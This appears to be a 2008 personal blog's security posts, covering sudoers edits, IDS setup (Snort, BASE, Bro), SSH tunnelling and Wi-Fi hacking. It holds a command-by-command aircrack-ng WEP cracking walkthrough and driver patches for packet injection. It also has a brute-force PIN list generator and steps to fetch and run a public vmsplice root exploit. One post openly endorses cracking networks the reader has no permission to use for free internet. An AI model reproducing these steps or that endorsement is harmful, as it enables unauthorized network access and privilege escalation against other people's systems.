Showing posts with label Security. Show all posts

May 25, 2008


Edit Sudoers for No Pass Prompt

If you have a script that needs to run daily, such as an 'apt-get' update, you will probably want to get rid of the password prompt every time it calls 'apt-get'. The same goes for a script that should run at startup: you do not want to be prompted for a password, you want it to run fully in the background. To allow that you need to edit the 'sudoers' file located in '/etc/'.

Before we begin, be clear about the power of 'sudo': whatever you list here runs as root without a password. If you do not know what the 'sudo' command does, do a Google search on 'sudo' first. Allowing a user to run a risky command without a password prompt can compromise the whole system. So, here are the steps to edit sudoers:

  • Open up a terminal (Applications > Accessories > Terminal)
  • First find out where the binary lives, because sudoers needs the full path of the command. Use the 'which' command; for 'apt-get', run 'which apt-get' and it returns the exact location:
$ which apt-get
/usr/bin/apt-get
  • Open the sudoers file with visudo (I'll use nano as the editor for this tutorial). Do not edit /etc/sudoers with a plain editor: visudo locks the file while you edit and refuses to save a line with a syntax error, and a syntax error in sudoers locks everyone out of sudo.
sudo EDITOR=nano visudo
  • You will be prompted for your password. Enter your user password and the editor will appear. Find the lines:
# User privilege specification
root ALL=(ALL) ALL
  • Add a line below them with your user and the command you would like to allow. For example, my user is "gunblade" and I would like 'apt-get' to run without any password prompt, so I add this line:
# User privilege specification
root ALL=(ALL) ALL
gunblade ALL=(root) NOPASSWD: /usr/bin/apt-get
  • Save and exit, then check what sudo now allows you with 'sudo -l'.

So that is the trick for a simple change to the sudoers file. Choose carefully which commands you allow, because a wrong entry can do real damage to your system. Note that 'apt-get' in particular is as powerful as root: it installs arbitrary packages and can run hooks (for example via '-o DPkg::Pre-Invoke=...') that execute a shell, so a NOPASSWD rule for the bare command gives that user root. Lock such rules down to the exact arguments you need (e.g. '/usr/bin/apt-get update'), and keep the password prompt for anything interactive. Edit at your own risk~!
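As an added example (not from the original post), here is a small shell helper that builds a narrow NOPASSWD rule as a /etc/sudoers.d drop-in, has visudo validate it before it can break sudo, and shows how to verify the result. The user name "gunblade" and the allowed commands are assumptions.

```shell
#!/bin/sh
# Added example: build, validate and install a narrow NOPASSWD sudoers rule.
# The user "gunblade" and the apt-get commands below are assumptions.

# Emit one sudoers line.  Every command must be an absolute path: sudoers does
# not search PATH and a bare name is a syntax error.  Arguments after the path
# (e.g. "update") pin the rule to exactly those arguments, so the user cannot
# add options such as -o DPkg::Pre-Invoke=... to get a root shell.
sudoers_rule() {
  user=$1; shift
  [ $# -gt 0 ] || { echo "sudoers_rule: no commands given" >&2; return 1; }
  list=""
  for cmd in "$@"; do
    case $cmd in
      /*) ;;
      *) echo "sudoers_rule: '$cmd' is not an absolute path" >&2; return 1 ;;
    esac
    list="${list:+$list, }$cmd"
  done
  printf '%s ALL=(root) NOPASSWD: %s\n' "$user" "$list"
}

# Write the rule to a temp file, let visudo check the syntax, and only then
# install it under /etc/sudoers.d with the mode sudo insists on (0440).
# Needs root.  Afterwards "sudo -l -U <user>" shows what the user may run.
install_rule() {
  name=$1; shift
  tmp=$(mktemp) || return 1
  sudoers_rule "$@" > "$tmp" || { rm -f "$tmp"; return 1; }
  if visudo -cf "$tmp"; then
    install -o root -g root -m 0440 "$tmp" "/etc/sudoers.d/$name"
    rc=$?
  else
    echo "install_rule: syntax error, not installing" >&2; rc=1
  fi
  rm -f "$tmp"
  return $rc
}

# Example: let gunblade run only "apt-get update" and "apt-get upgrade -y"
# without a password.  As root:
#   install_rule gunblade-apt gunblade "/usr/bin/apt-get update" "/usr/bin/apt-get upgrade -y"
#   sudo -l -U gunblade
sudoers_rule gunblade "/usr/bin/apt-get update" "/usr/bin/apt-get upgrade -y"
```

The drop-in approach keeps your change out of the main /etc/sudoers file, so a later package upgrade cannot clobber it, and visudo -cf is the same check visudo performs before it lets you save.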


Apr 20, 2008


Your Access Point being sniff?

As I was wondering just how easy it is for someone to break into a WEP-protected access point (don't use WEP), I googled around for other applications that are fun to play with, and I stopped at a page about WifiZoo.

What is it?

WifiZoo is a tool for passively gathering Wi-Fi information, from access points down to client details. It collects the BSSID and ESSID of each AP and the clients connected to it. In short, WifiZoo is quite similar to airodump-ng: it gathers all sorts of information and writes it to .cap files.

Right now some of the BackTrack folks are working on integrating WifiZoo with aircrack-ng as the information-gathering stage. It would be a great combination if this tool came bundled with aircrack-ng.

Capabilities

WifiZoo integrates well with Kismet for channel hopping. By default WifiZoo does not hop channels, but it will follow Kismet's hopping if Kismet is running:
  • run kismet
  • run wifizoo
  • wait - it will work
Channel hopping, channelvelocity, channeldwell, defaultchannels and sourcechannels are all Kismet settings; edit the Kismet configuration to tune them.

Requirements

  • Python
  • Scapy (the Python packet library WifiZoo is built on)
  • Kismet, if you want channel hopping.
So it is not safe to assume a wireless connection is private. On an open or WEP network anyone in range can capture your traffic, and anything sent in the clear (plain HTTP, unencrypted chat, mail without TLS) is readable by whoever is listening. Online banking over HTTPS is encrypted regardless of the Wi-Fi, but everything you send without encryption is not.
Maybe the next morning you will read your own conversation on the net as soon as you wake up.


Apr 15, 2008


UBUNTU: SVN aircrack version (1.0 Beta 2)

Sorry for the late follow-up on my previous tutorial about aircrack. Life has been busy with programming work and also web design at my practical company. So here is a quick guide on how to install the new Aircrack-ng 1.0 beta 2 for Ubuntu users.

sudo apt-get install subversion build-essential libssl-dev
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
Now build and install aircrack-ng. The checkout above lands in a directory named aircrack-ng, so that is where you cd to; the build needs a compiler and the OpenSSL headers, which is why build-essential and libssl-dev are in the apt-get line:
cd aircrack-ng
make
sudo make install
This installs the new aircrack-ng to work with the latest SuD patch. Some people get errors after applying the SuD patch when running Aircrack 0.9.3 on Ubuntu, so this is the solution.

As far as I have been using this, I have had no problem with the patch or with aircrack-ng itself. Here is a review I posted previously on running aircrack with bcm43xx.

So I assume that the SuD patch is stable for bcm43xx running under Aircrack-ng 1.0 beta 2. Thanks to SuD for the patch, and please leave a comment if any step was left out.


Apr 14, 2008


Script to generate Numbers Combination

This is a script to generate all combinations of the digits 0-9 for however many digits you specify when running the script. It's a simple script that took me 5 minutes to write, and I got the idea from one of my friends.

This script is useful for anyone who wants to generate a numeric wordlist (PINs and the like) for brute forcing. Here is the script:

#!/bin/sh
# Usage: sh [script name] [digits] > [output file] &
# Prints every number from 0 to 10^digits - 1, zero-padded to [digits] places.
digits=$1
case $digits in
  ''|*[!0-9]*|0) echo "usage: $0 <digits>" >&2; exit 1 ;;
esac
finish=1; i=0                     # finish = 10^digits, without needing bc
while [ "$i" -lt "$digits" ]; do
  finish=$((finish * 10)); i=$((i + 1))
done
fmt="%0${digits}d\n"              # e.g. %04d pads 7 to 0007
count=0
while [ "$count" -lt "$finish" ]; do   # stops at 10^digits - 1, not one past it
  printf "$fmt" "$count"
  count=$((count + 1))
done
On a system with GNU coreutils, "seq -w 0 999" produces the same list as running the script with 3 digits.

Why did I only write a script for number combinations? The answer is simple: the keyspace grows as (alphabet size)^length. For eight digits that is 10^8 = 100,000,000 lines, but for eight printable ASCII characters it is 95^8, more than 6 quadrillion lines, which is far too much for a single machine to generate and store, and would take a very long time. For anything beyond digits it is better to generate candidates on the fly and pipe them straight into the cracker than to write a wordlist to disk.

If you want to calculate how long generating all combinations of a given number of characters will take, you can do the calculation on this website, Generator Calculator.

Look at the time needed to generate a full ASCII password list; it is not worth your time. If you ever need a full ASCII generator, you can download it right here.

* The script will be updated soon to be more user friendly.


Apr 9, 2008


Blog: Backup your blog daily~!

Have you ever lost all of your posts, or maybe half of them, due to technical problems? Or, worse, never backed up your posts at all? I think a lot of people have experienced this kind of problem. Losing the posts of your blog is a total nightmare for active bloggers.

Give BlogBackup a try to manage your backups daily. What does BlogBackup offer?

  • It runs over the internet (which means you can restore or back up your blog from anywhere in the world as long as you have an internet connection)
  • You can set up a daily backup of your blog.
  • No installation needed
  • It works with almost any blog (99% of blogs are supported)

Does BlogBackup have what it takes to manage your blog's backups? My personal answer is YES, definitely. Privacy? Yes; you can read about it in the privacy policy.



Patch for iwl4965 testing version

Hello. Those who want to test aircrack-ng, Kismet or any other Wi-Fi cracking application need to put their card into monitor mode. As far as I know, iwl4965 is a new chipset from Intel, and there is no patch on the net yet to let iwl4965 do packet injection.

So I googled around and found that someone has managed to do injection with iwl4965 cards, and luckily he shares the patch for others to try. Those interested in playing with wireless APs can download the patch for iwl4965 from patch iwl4965.

To apply the patch, run "patch -p1 -i [patch filename]" from the top of the kernel source tree (check the paths inside the patch file and pick the matching -p level; the source must be the kernel version the patch was written against, otherwise the hunks fail to apply). After that, recompile the modules and copy the new module over the one in your current module directory for the patch to take effect.

Moreover, if you need more information on the patch, please read the forum discussion about iwl4965 injection here.


Apr 8, 2008


Aircrack-ng review on bcm43xx

This post took me 2 days to get ready. So here is exactly how I crack WEP in about 20 minutes.

Two things need to be in place before we can crack the wireless network. First you need to know how WEP works; you can read about WEP here. Then, to make cracking possible with aircrack-ng on bcm43xx, you need to patch your driver; I posted a how-to for patching bcm43xx earlier in this post.

Here are the four steps (all the tool names carry the -ng suffix in current aircrack-ng):

  • sudo airmon-ng [start|stop|check] [wireless interface] [channel]
  • sudo airodump-ng -c [channel] --bssid [target mac] -w [prefix for output file] [interface]
  • sudo aireplay-ng -1 0 -a [target mac] -h [your wireless mac] [interface]
  • sudo aireplay-ng -3 -b [target mac] -h [your wireless mac] [interface]
Now wait until airodump-ng has captured enough packets. Around 1,300,000 IVs is plenty for the older statistical (KoreK) attack on a 128-bit key; with the PTW attack that aircrack-ng 0.9 and later use by default, a few tens of thousands of captured ARP packets are usually enough, so try the crack early and keep capturing if it fails. Once you have enough IVs it is time to crack:
  • sudo aircrack-ng [.cap files]
You can add more options depending on the WEP key (for example -n 64 for a 64-bit key); for more information refer to the manual page of the command.


Apr 2, 2008


UBUNTU: Crack wireless with bcm43xx?

It took me a long, long time to learn how to get this right. My first try was a year ago, when I tried to use aircrack-ng to crack WEP with my bcm43xx Wi-Fi card. At that time Broadcom cards were not supported for monitor mode (at least, not by the driver).

But yesterday, when I had a chance to chat with an IRC user whose nick I won't publish here, we talked about several things in wireless security, meaning how secure a secured wireless network (WEP/WPA) really is and how fast it can be hacked and cracked. It started with him: he managed to find about 60 access points at his place, all encrypted with WEP/WPA.

So, to make it short, aircrack-ng is the best tool for the situation where you want onto a wireless network you are not allowed to access; why not crack it and have your internet connection for free? We discussed the applications, and aircrack-ng seemed the best because it is easy to use. You can learn a little about aircrack-ng from here.

So I would like to give my way of configuring a Broadcom (bcm43xx) card for use with aircrack-ng. Today bcm43xx supports injection, monitor mode and packet capture, but only after you patch the driver. Here is how to set up your bcm43xx (the "#" is the prompt; the commands are run from your home directory):

  • #mkdir bcm43xxinject
  • #cd bcm43xxinject

  • You now need a sub directory for our kernel output

  • #mkdir kernelout

  • #cp /boot/config-2.6.22-14-generic ./config-2.6.22-14-generic

  • #cd kernelout

  • #ln -s ../config-2.6.22-14-generic .config

  • Now you need to get the kernel source for Gutsy, go get a snack while it downloads, it is about 60 meg.

  • #cd ../
  • #apt-get source linux-image-2.6.22-14-generic

  • get the new patch (updated for the new kernel), and patch the kernel:

  • #cd linux-source-2.6.22-2.6.22/drivers/net/wireless/bcm43xx ; wget -nc http://www.latinsud.com/bcm/bcm43xx-injection-linux-2.6.20.patch

  • #patch -p1 < [ exact location of patch file ] (look at the paths inside the patch to confirm the -p level and the directory it expects to be applied from; a "Hunk FAILED" message means the source does not match the patch)
  • Now we compile the new bcm43xx kernel module

  • #cd ~/bcm43xxinject/linux-source-2.6.22-2.6.22

  • We have to manually change the version info (a bug in the source package) so the module's version string matches the running kernel; otherwise modprobe refuses to load it.

  • #sudo gedit Makefile

    change EXTRAVERSION from "= 9" to "= -14-generic" (compare with the output of "uname -r"). This should be the default but it has not been updated yet. Save and exit, then:

  • #make O=../kernelout outputmakefile
  • #make O=../kernelout archprepare

  • #make O=../kernelout modules

  • That last one will take a while. Finish your snack you got before, maybe go watch some tv or something industrious like that.
    Now with all gods willing hope this would compile with no errors.

    Remember to always backup...

  • #cd ..

  • #mkdir kernelbackup

  • #cd kernelbackup

  • #sudo cp /lib/modules/2.6.22-14-generic/kernel/drivers/net/wireless/bcm43xx/*.ko ./

  • We are finally ready to install our 'pachinko' new patched drivers:
  • #cd ..

  • #cd kernelout/drivers/net/wireless/bcm43xx/

  • #sudo cp -dpR *.ko /lib/modules/2.6.22-14-generic/kernel/drivers/net/wireless/bcm43xx/

    Next we have to load our new drivers:

  • #sudo modprobe -r bcm43xx
  • #sudo modprobe bcm43xx
So now you have your bcm43xx working. Note: if you were using ndiswrapper before this, remove bcm43xx from your blacklist (under /etc/modprobe.d) so that the module loads at startup. This is important: if you leave bcm43xx blacklisted there is no point in applying this patch.

But if you would like to keep using ndiswrapper for surfing and all other work (everything except aircrack-ng), then you do not have to remove bcm43xx from the blacklist. All you need to do is:

  1. To load bcm43xx:
    1. sudo modprobe -r ndiswrapper ; sleep 5 ; sudo modprobe bcm43xx
  2. To load ndiswrapper back:
    1. sudo modprobe -r bcm43xx ; sleep 5 ; sudo modprobe ndiswrapper
So there you go. I hope everything works out for you. bcm43xx isn't that bad, right?


Mar 26, 2008


LINUX: Sguil 0.7.0 is out :)

For those who don't know what Sguil is: Sguil is a network security monitoring system that captures packets and raises alerts based on signatures. What is the difference between Snort and Sguil? Sguil has a GUI (the Sguil client) on top of Snort's alerts, which a network admin can use day to day to check network traffic, alerts and so on.

So Sguil 0.7.0 is out; what is different from 0.6.1? There are some changes in the architecture. As far as I know, in version 0.6.1 there was no PADS (Passive Asset Detection System) in the sensor architecture; it was added in 0.7.0 to detect the services running on the network.

The workflow is much the same as in 0.6.1, I hope. I still haven't had time to try it out, but from what I read on the Sguil website there are a lot of interesting features added. I really need to give this a try.

For those who would like to try it but don't know what Sguil is, please refer to the Sguil website before proceeding with the installation. Read the requirements and the user guide carefully.


Mar 25, 2008


LINUX : SSH Tunneling from Windows SSH Server

I've successfully set up an OpenSSH server on my office Windows XP box for tunneling purposes, hehe. I need a tunneling box so that I can get full access to the internet, without any blocked ports, when I get back to school.

Here is how to set up OpenSSH on a Windows box (via Cygwin):

  • Download Cygwin from here. Make a new directory, C:\cygwin, and put the setup.exe you just downloaded there.
  • Run the setup and choose a mirror. When the setup asks whether to make Cygwin available to all users or just you, choose "Available to all users", and follow the steps.
  • When it asks for a local package directory, point it to C:\cygwin.
  • In the package selection, make sure you select the openssh package; without it there is no point in the rest of the setup.
  • After the install finishes, a few things need to be set up before we can use the console and sshd:
    • Set a password for the current user (make sure the user has admin privileges). sshd will not let you log in to an account with an empty password.
    • Open My Computer > Properties, go to the Advanced tab and click Environment Variables.
    • Under System Variables, add or edit these values:
      • Variable = CYGWIN | Value = ntsec tty
      • Variable = Path | Value = (append to the end of the line) ";C:\cygwin\bin" without the quotes.
    • Done. Now log out and back in to the user, and make sure the password is active. If it isn't, you may need to restart Windows.
  • Now we need to map the Windows users into Cygwin so that they can log in through ssh:
    • Open the Cygwin console by double-clicking its icon on the desktop.
    • Install the sshd service with the command "ssh-host-config -y".
    • When prompted for the "environment variable CYGWIN", answer "ntsec tty".
    • Start sshd with "net start sshd" or "cygrunsrv --start sshd".
    • Still in the Cygwin console, type:
      • mkpasswd -cl > /etc/passwd
      • mkgroup --local > /etc/group
This box is now an SSH server reachable from the internet, so the usual hardening applies: put your public key in ~/.ssh/authorized_keys on the Windows side, then set "PasswordAuthentication no" in the Cygwin tree's /etc/sshd_config and restart the service, so nobody can brute-force the password you just set.

And now we are finished. Open a terminal on your Linux laptop/PC and type:
  • ssh -D 9999 -C [user]@[windows host], then enter the password you set for the user. Voilà: set your browser to use a SOCKS v5 proxy at localhost port 9999 (with remote DNS, if the browser offers it, so name lookups also go through the tunnel) and you are good to go.
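An added example (not part of the original post): a client-side ~/.ssh/config entry for the SOCKS tunnel, plus a check that traffic, including DNS lookups, really goes through it. The host alias "office-xp", the user "gunblade", the key file name and the check URL are assumptions.

```shell
#!/bin/sh
# Added example: ssh client config for the -D tunnel and a leak check.
# Host alias, user name, key path and check URL are assumptions.

# Append a Host block so the tunnel becomes just "ssh office-xp".
#  - DynamicForward 127.0.0.1:9999 : the -D from the post, bound to localhost only
#  - ExitOnForwardFailure          : fail loudly if port 9999 is already in use
#  - ServerAliveInterval           : keep an idle tunnel from being dropped
#  - IdentitiesOnly/IdentityFile   : key authentication, so the server can have
#                                    PasswordAuthentication turned off
#  - Compression yes               : the -C from the post
write_tunnel_config() {
  cfg=$1 host=$2 user=$3 hostname=$4 port=${5:-9999}
  cat >> "$cfg" <<EOF
Host $host
    HostName $hostname
    User $user
    DynamicForward 127.0.0.1:$port
    ExitOnForwardFailure yes
    ServerAliveInterval 30
    IdentitiesOnly yes
    IdentityFile ~/.ssh/id_rsa_$host
    Compression yes
EOF
  chmod 600 "$cfg"
}

# Only applications configured to use the SOCKS proxy go through the tunnel,
# and a browser set to "SOCKS v5" without remote DNS still resolves names on
# the local network in the clear.  curl's socks5h:// scheme resolves through
# the proxy, so this confirms both the tunnel and the DNS path.
tunnel_check() {
  port=${1:-9999} url=${2:-https://ifconfig.me/ip}
  curl -sS --max-time 10 --proxy "socks5h://127.0.0.1:$port" "$url"
}

# Usage:
#   write_tunnel_config ~/.ssh/config office-xp gunblade office.example.com
#   ssh -fN office-xp        # -f: go to background, -N: no remote command
#   tunnel_check             # should print the office's public address, not yours
```

Firefox exposes the remote-DNS setting as network.proxy.socks_remote_dns; without it, or the equivalent in another browser, the tunnel hides the page contents but not which hosts you look up.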


Feb 13, 2008


UBUNTU: Setting up SNORT + BASE on Gutsy

Snort (Intrusion Detection System)
BASE (Basic Analysis and Security Engine)
MySQL (Used as database to store alerts and information)
Apache2 (As a web server to view BASE reports)
Gutsy Gibbon (Ubuntu release)

Here is the step to setup SNORT + BASE:

  • Gain root access:
    • sudo su -
  • We need the dependencies in place to build and run Snort and BASE. Install them with apt-get, or just paste the line below into your terminal:
    • apt-get install libpcre3-dev libpcap0.8-dev libmysqlclient15-dev mysql-client-5.0 mysql-server-5.0 bison flex apache2 libapache2-mod-php5 php5-gd php5-mysql libphp-adodb php-pear libc6-dev g++ gcc pcregrep
  • Then make a dedicated folder to collect every source tarball before we compile, so the system stays neat and you can keep the sources for later use:
    • mkdir /snort
    • mkdir /etc/snort
    • mkdir /etc/snort/rules
    • cd /snort
  • Now fetch every file needed to run Snort and BASE (in this tutorial we compile Snort from source ourselves):
    • wget http://www.snort.org/dl/current/snort-2.8.0.1.tar.gz
    • wget http://snort.org/pub-bin/downloads.cgi/Download/vrt_pr/snortrules-pr-2.4.tar.gz

  • Now extract and compile the source codes:
    • tar xvf snort-2.8.0.1.tar.gz ; cd snort-2.8.0.1 ; tar xvf /snort/snortrules-pr-2.4.tar.gz
    • ./configure --enable-dynamicplugin --with-mysql
    • make
    • make install
  • Now we need to make things on it's directory(working directory)
    • mkdir /etc/snort /etc/snort/rules /var/log/snort
      • cd /snort/snort-2.8.0.1/etc
      • cp * /etc/snort/
      • cd ../rules
      • cp * /etc/snort/rules
  • Now edit the Snort config to suit your network:
    • nano /etc/snort/snort.conf
      • change "var HOME_NET any" to "var HOME_NET 192.168.1.0/24" (use your own network range).
      • change "var EXTERNAL_NET any" to "var EXTERNAL_NET !$HOME_NET"
      • change the rules directory to "var RULE_PATH /etc/snort/rules"
      • Last, set how Snort will log alerts; we use MySQL in this tutorial. Scroll down, search for "output database", uncomment the mysql line and edit it to match your database connection: user = your username ; password = your user password ; dbname = your database name ;
      • save and quit.
      • the file now contains a database password, so restrict its permissions:
        • chmod 600 /etc/snort/snort.conf
  • Now set up the database the alerts will be written to:
    • mysql -u root -p, then enter the MySQL root password
    • mysql> create database snort;
    • mysql> grant all privileges on snort.* to 'snort'@'localhost' identified by 'snort_password';
      (note the quoting: the user and the host are quoted separately; writing 'snort@localhost' as one string would create a user literally named snort@localhost that Snort can never log in as)
    • mysql> exit
  • Now create the tables in the database we just created:
    • mysql -D snort -u snort -p < /snort/snort-2.8.0.1/schemas/create_mysql
    • use the database password you set in the step above.
  • Now test Snort:
    • snort -T -c /etc/snort/snort.conf (-T validates the configuration and exits; if you run it without -T, Snort keeps running and you stop it with Ctrl+C)
    • if it finishes without any error message, you are fine.
    • if you get an error from the rules, comment out lines 97, 98 and 452 of "/etc/snort/rules/web-misc.rules" (prefix them with #); this was a known issue with that rules release and this Snort version.
  • Now it is time to set up BASE:
    • cd /snort
    • wget http://easynews.dl.sourceforge.net/sourceforge/secureideas/base-1.3.9.tar.gz
    • cd /var/www ; tar xvf /snort/base-1.3.9.tar.gz
    • mv base-1.3.9 base
    • chown -R www-data:www-data base (the web setup page needs to write base_conf.php, so give the directory to the web server's user rather than making it world-writable with chmod 757; once setup is done you can hand it back to root and chmod 755 it)
  • We want a couple of PEAR modules for the graphs:
    • pear install Image_Color
    • pear install Image_Canvas-alpha
    • pear install Image_Graph-alpha
  • NOW IT'S TIME TO SET UP BASE FROM YOUR WEB BROWSER:
    • open a browser and go to this URL:
      • http://{your hostname}/base/index.php
    • Click to continue past the first page.
    • There are 5 steps to set up BASE:
      1. Enter the ADODB path: /usr/share/php/adodb
      2. Enter the details of the database we created earlier in this tutorial.
      3. Check the box to enable authentication. Do this: BASE shows every alert on your network, and without it anyone who finds the URL can read them.
      4. Click "Create BASE AG"
      5. Once step 4 finishes, click "Now Continue to ...."
    • Bookmark this page for future access.
  • Now set Snort to run at startup:
    • nano /etc/rc.local
    • add this before "exit 0" (use your sniffing interface in place of eth0)
      • /usr/local/bin/snort -c /etc/snort/snort.conf -i eth0 -D
    • Save and exit.
  • Now reboot the box.
  • After the reboot, check whether Snort is running with ps:
    • ps aux | grep '[s]nort'
    • if you see a line with "/usr/local/bin/snort -c ..." then Snort is running.
  • We are done!
Access your alerts from a browser anywhere by opening "http://{your hostname}/base/" (we renamed the directory to "base" above) and logging in. Tune your rules to avoid false alarms: load only the rules you need to monitor your box.
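As an added example (not from the original post), the snort.conf edits from the steps above applied with sed, so the result is the same every time, with a check that every edit landed and the MySQL grant printed with the quoting MySQL expects. The sample configuration inside the script is constructed to look like the relevant lines of the Snort 2.8 default file; the network range and database credentials are assumptions.

```shell
#!/bin/sh
# Added example: apply and verify the snort.conf edits, and print the grant.
# The sample config, network range and credentials are constructed/assumed.

# configure_snort <in> <out> <HOME_NET> <rule dir> <db user> <db password> <db name>
configure_snort() {
  sed \
    -e "s|^var HOME_NET .*|var HOME_NET $3|" \
    -e 's|^var EXTERNAL_NET .*|var EXTERNAL_NET !$HOME_NET|' \
    -e "s|^var RULE_PATH .*|var RULE_PATH $4|" \
    -e "s|^# *output database: log, mysql,.*|output database: log, mysql, user=$5 password=$6 dbname=$7 host=localhost|" \
    "$1" > "$2" && chmod 600 "$2"     # the output now holds a password
}

# check_snort_conf <file> <HOME_NET>: 0 only if every edit is present.
# Run this (and "snort -T -c <file>") before starting Snort as a daemon.
check_snort_conf() {
  grep -q "^var HOME_NET $2\$" "$1" &&
  grep -q '^var EXTERNAL_NET !\$HOME_NET$' "$1" &&
  grep -q '^output database: log, mysql, user=' "$1" &&
  ! grep -q '^var HOME_NET any$' "$1"
}

# snort_grant_sql <db user> <db password> <db name>: the statements for the
# "setup database" step.  User and host are quoted separately.
snort_grant_sql() {
  cat <<EOF
CREATE DATABASE IF NOT EXISTS $3;
GRANT ALL PRIVILEGES ON $3.* TO '$1'@'localhost' IDENTIFIED BY '$2';
FLUSH PRIVILEGES;
EOF
}

# Constructed sample of the lines we care about (not a full snort.conf).
sample_conf() {
  cat <<'EOF'
var HOME_NET any
var EXTERNAL_NET any
var RULE_PATH ../rules
# output database: log, mysql, user=root password=test dbname=db host=localhost
EOF
}

# Demo on a scratch copy.  For the real file, pass /etc/snort/snort.conf as
# the output and then run "snort -T -c /etc/snort/snort.conf".
tmpdir=$(mktemp -d)
sample_conf > "$tmpdir/snort.conf.in"
configure_snort "$tmpdir/snort.conf.in" "$tmpdir/snort.conf" \
  192.168.1.0/24 /etc/snort/rules snort snort_password snort
check_snort_conf "$tmpdir/snort.conf" 192.168.1.0/24 && echo "snort.conf edits applied"
snort_grant_sql snort snort_password snort
```

Pipe the output of snort_grant_sql into "mysql -u root -p" instead of typing the grant by hand; a password containing "|" or "&" would need escaping in the sed replacement, so keep the database password to letters and digits.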

Happy Ubuntu-ing~


Feb 10, 2008


UBUNTU: vmsplice exploit fix!

I was shocked when I received an alert from kagesenshi on #myoss at freenode.net regarding the kernel exploit that affects kernels 2.6.17 to 2.6.24. So I tried the exploit, and in a split second I had root access without needing any password or sudo command.

What an exploit! It takes advantage of the vmsplice code in the kernel to gain root. The Ubuntu dev team is working to release a kernel patch as soon as possible, but either way you need to protect your current kernel before the official fix is released.

Here are the steps to apply the workaround (it is not a real kernel patch: as its name suggests, the program uses the bug itself to disable the vulnerable vmsplice system call in the running kernel, which is why it has to be run again after every reboot, see the update below):

  • Open up a terminal:
    • wget http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitable.c
    • cc -o disable-vmsplice disable-vmsplice-if-exploitable.c
    • ./disable-vmsplice
  • And you're done.
But if you would like to test your kernel before applying the workaround, here is how to exploit your own kernel:
  • Open up a terminal:
    • wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
    • cc -o exploit 27704.c
    • ./exploit
  • If you get a root shell, you are vulnerable. If it fails, your kernel is most likely not affected and there is no need for the workaround. This is a negative test only: a distribution kernel may carry a backported fix under an old version number, and the exploit may also simply fail to run on your configuration.
  • ****UPDATE****
  • You need to apply the workaround on every boot, because it only changes the running kernel. To make it run automatically until the kernel update arrives, put it in rc.local. Do not call the binary "patch" and do not copy it into /usr/bin: that overwrites the real patch(1) utility. Instead:
    • sudo install -m 0700 disable-vmsplice /usr/local/sbin/disable-vmsplice
    • sudo nano /etc/rc.local
    • add the following line before "exit 0"
      • /usr/local/sbin/disable-vmsplice
    • It will then run on every startup until the kernel update is released; remove the line once the fixed kernel is installed.
That is all for now. If you have any difficulties with this tutorial, please leave a comment.



UBUNTU: Snort + Base setup in progress

Hello, it's been a couple of days since my last post. I had no ideas, actually. As my last post mentioned, "What a boring CNY" (for sure it's boring when you don't have a penny to spend for CNY).

Now I'm in the process of setting up Snort + BASE on my experimental laptop project. Why do I need such a thing on my old, cheap laptop? Because it's accessible from the net through a web server, SSH and FTP. Yes, I run a web server on my laptop. To be honest, I doubt anybody would want to own my laptop, but I'm setting up Snort and BASE to learn about network monitoring and to get to know what an Intrusion Detection System is.

Why an IDS (Intrusion Detection System) instead of an IPS (Intrusion Prevention System)? The answer is simple: I have read a lot of blogs, including my favourite blog (Ayoi's Blog), about the difference between IDS and IPS. Let's get the basics first: I'll learn about the detection process before looking at prevention.

My Snort + BASE setup is going quite well, but a few things need to be configured before I can post the HOW-TO. Mostly the signatures are the issue. Never mind, I'll write a HOW-TO as soon as I get some time, a peaceful time.

Thanks to Mr Fenris, Mr Papit and Mr Dolphin for helping me out with some issues. Thanks a lot, guys!


Feb 1, 2008


UBUNTU: Installing Bro-IDS

Today is a public holiday in Kuala Lumpur: it's Wilayah Day! But it's a bit boring when you don't have any plans, so I was a little bored and in a "trial and error" mood. I googled around and found a nice tutorial on how to install an IDS called Bro-IDS.

IDS means Intrusion Detection System, a common term sysadmins use in their daily working hours. I'm not one of them, for sure, but I'd like to try what they call the basic fundamentals of detecting network intrusions. I followed the tutorial here but couldn't compile the source, so I figured out some additional steps that need to be done before compiling the source code.

So I came up with this how-to:

  1. First you need all the dependencies ready before compiling the Bro-IDS source code. Open a terminal and run apt-get:
  2. sudo apt-get install libncurses5-dev g++ bison flex libmagic-dev libgeoip-dev libssl-dev
  3. After the dependencies are installed, download the source code. In this tutorial I'll use the stable release of Bro-IDS; you can download it here.
  4. I'll assume the source tarball is on your desktop. Type "cd Desktop/" to go to the desktop folder.
  5. Unpack the tarball with "tar zxvf bro-1.2-stable.tar.gz"
  6. cd into the directory the tarball created (bro-1.2.1 here)
  7. ./configure
  8. make
  9. sudo make install (it installs under /usr/local, so root is needed)
  10. sudo make install-brolite
Voilà, you're done installing Bro-IDS. If brolite fails to run, check bro.cfg: you may have made a mistake when configuring it during the "make install-brolite" step. Happy trying!


Jan 2, 2008


Security: Xterendak Defacement!

I received a call early this morning from my friend telling me that his website had been hacked by a Turkish group. I read about Turkish hackers a few days ago; they are competing among themselves on how many websites they can deface.

One of the sites they defaced is my friend's: http://www.xterendak.net/v7/index.php
It was a sad day for him and for me, because I was one of the admins there. Haha, it's a bit funny. But a lesson was learned from the mistake we made: the latest patch had not been applied to the website, due to laziness among the administrators.

Anyway, thanks for reminding us to keep our website patched to avoid defacement in the future.


